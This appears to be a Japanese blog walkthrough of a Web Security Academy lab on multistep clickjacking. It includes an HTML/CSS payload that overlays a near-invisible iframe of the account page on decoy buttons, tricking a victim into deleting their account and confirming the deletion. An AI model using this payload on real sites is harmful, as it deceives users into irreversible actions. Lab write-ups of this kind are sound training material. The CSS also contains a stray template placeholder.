Hello there, ('ω')ノ 

 

マルチステップクリックジャッキングを。

 

このラボには、 CSRFトークンで保護されているアカウント機能があって。

さらには、確認のダイアログもあり クリックジャッキング ます。

このラボを解決するには、アカウントの削除ボタンをクリックさせて。

次に確認ボタンをクリックする攻撃を作成して。

 

まずは、ログインして。

 

 

Deleteをクリックして。

 

 

最後にYesをクリックするようで。

ここでクリックすると削除されるので。

 

 

一旦、Dropして。

 

 

リクエストをリピータへ。

 

 

CSRFを削除してSendすると、正常なレスポンスが返って。

　csrf=jzGxI8S4itomg9Y2aNyXysHaMBObfjhT

 

 

ちなみにメソッドをGETに変更して。

 

 

CSRFを削除してSendすると、Not Foundだとか。

 

 

下記のコードを挿入して。

 

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top: 500px;
left: 20px;
z-index: 1;
}
.secondClick {
top: 300px;
left: 220px;
left:$side_value2;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac801fdf1f33d06c8047022200b00016.web-security-academy.net/my-account"></iframe>

 

 

はじめのボタンの位置を調整して。

 

 

ふたつめのボタンの位置を調整して。

 

 

Storeして、Deliverするとクリアできた。

 

 

実際にView exploitで一連のボタンをクリックしてみて。

 

 

ログインしようとすると削除されていて。

 

 

Best regards, (^^ゞ